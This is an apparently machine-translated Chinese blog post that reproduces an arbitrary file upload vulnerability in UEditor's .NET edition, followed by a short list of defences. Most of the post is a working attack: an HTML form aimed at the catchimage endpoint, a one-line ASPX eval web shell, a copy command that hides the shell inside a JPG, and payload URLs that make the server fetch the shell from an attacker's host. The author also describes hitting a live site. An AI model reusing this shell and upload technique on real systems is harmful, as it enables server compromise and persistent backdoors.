当前位置:网站首页>UEditor . Net version arbitrary file upload vulnerability recurrence
UEditor . Net version arbitrary file upload vulnerability recurrence
2022-07-02 06:55:00 【Xu Jirong】
Catalog
Vulnerability background
Holes affect
Exploit
Vulnerability analysis
Defensive measures
Vulnerability background
UEditor By Baidu WEB WYSIWYG open source rich text editor developed by front end R & D department
Holes affect
Impact of the vulnerability UEditor Of .Net edition , Other language versions are not affected for the time being .
Exploit
First prepare a html Documents are used for post Submit
<form action="http://www.xxx.com/ueditor/net/controller.ashx?action=catchimage"enctype="application/x-www-form-urlencoded" method="POST">
<p>shell addr:<input type="text" name="source[]" /></p >
<input type="submit" value="Submit"/>
</form>
action Fill in the website at controller.ashx
The path of
in addition :enctype="application/x-www-form-urlencoded" What do you mean ?
open html After the following
At this time, we need a server to put the image Trojan , Servers can go to Alibaba cloud 、 Huawei cloud and others apply for free
We're going to prepare a 2.jpg
With a pony 3.aspx
, The pony code is as follows
<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
use cmd
Command composite picture Trojan horse
copy 2.jpg/b + 3.aspx/a 1.jpg
We upload this trojan horse to our server , Remember the server image path
Prior to shell addr
Fill in the following parameters
http://x.x.x.x/1.jpg?.aspx
http://x.x.x.x/1.jpg
Is the address of our server followed by .aspx
To generate aspx file , The page after submission is as follows
The file path we upload should be as follows
http://www.xxx.com/ueditor/net/upload/2206/2206-63790xxxxxxx0006134716.aspx
But I can't link it , Later I learned that the source code of the server was changed
The path here is guessed by chance , Normally, it should be prefixed
Here it is , So the Trojan path should be
http://www.xxx.com/upload/2206/2206-63790xxxxxxx0006134716.aspx
I found that the server had been invaded , And left the back door , I guess it's the source code changed by the intruder before
Vulnerability analysis
UEditor When capturing remote data sources , Will enter "catchimage" Branch
The cause of the vulnerability is that only ContentType, As a result, any file upload can be bypassed .
java Nah , Unable to analyze the source code , Wait until I finish my study
Defensive measures
1. Modify the project directory net/App_Code/CrawlerHandler.cs file , Add code to check the file type . 2. Use all kinds of WAF Software , Prevent attackers from uploading malicious files . 3. Check whether there are recently uploaded abnormal pictures in the file upload path ; Check for presence asp,aspx And other types of hazardous documents . If you find an exception file , Please delete in time after judgment .边栏推荐
- Queue (linear structure)
- Linux MySQL 5.6.51 Community Generic 安装教程
- Sqli labs customs clearance summary-page3
- 【文献阅读与想法笔记13】 Unprocessing Images for Learned Raw Denoising
- Latex compilation error I found no \bibstyle &\bibdata &\citation command
- js数组的常用的原型方法
- [leetcode question brushing day 35] 1060 Missing element in ordered array, 1901 Find the peak element, 1380 Lucky number in matrix
- 部署api_automation_test过程中遇到的问题
- Selenium memo: selenium\webdriver\remote\remote_ connection. Py:374: resourcewarning: unclosed < XXXX > solution
- Improve user experience defensive programming
猜你喜欢
如何调试微信内置浏览器应用(企业号、公众号、订阅号)
Pytest (2) mark function
UEditor .Net版本任意文件上传漏洞复现
VSCODE 安装LATEX环境,参数配置,常见问题解决
Présence d'une panne de courant anormale; Problème de gestion de la fsck d'exécution résolu
Solve the problem of bindchange event jitter of swiper component of wechat applet
CVE-2015-1635(MS15-034 )远程代码执行漏洞复现
Redis -- cache breakdown, penetration, avalanche
The default Google browser cannot open the link (clicking the hyperlink does not respond)
CVE-2015-1635(MS15-034 )遠程代碼執行漏洞複現
随机推荐
ts和js区别
Sqli - Labs Clearance (less6 - less14)
The table component specifies the concatenation parallel method
Cve-2015-1635 (ms15-034) Remote Code Execution Vulnerability recurrence
Tool grass welfare post
Sentry搭建和使用
Review of reflection topics
SQLI-LABS通關(less6-less14)
Sublime text configuring PHP compilation environment
Solution to the black screen of win computer screenshot
Promise中有resolve和无resolve的代码执行顺序
Storage space modifier in CUDA
Render minecraft scenes into real scenes using NVIDIA GPU
查询GPU时无进程运行,但是显存却被占用了
js中map和forEach的用法
Queue (linear structure)
Build learning tensorflow
Nodejs - Express middleware modification header: typeerror [err_invalid_char]: invalid character in header content
Blog directory of zzq -- updated on 20210601
Win电脑截图黑屏解决办法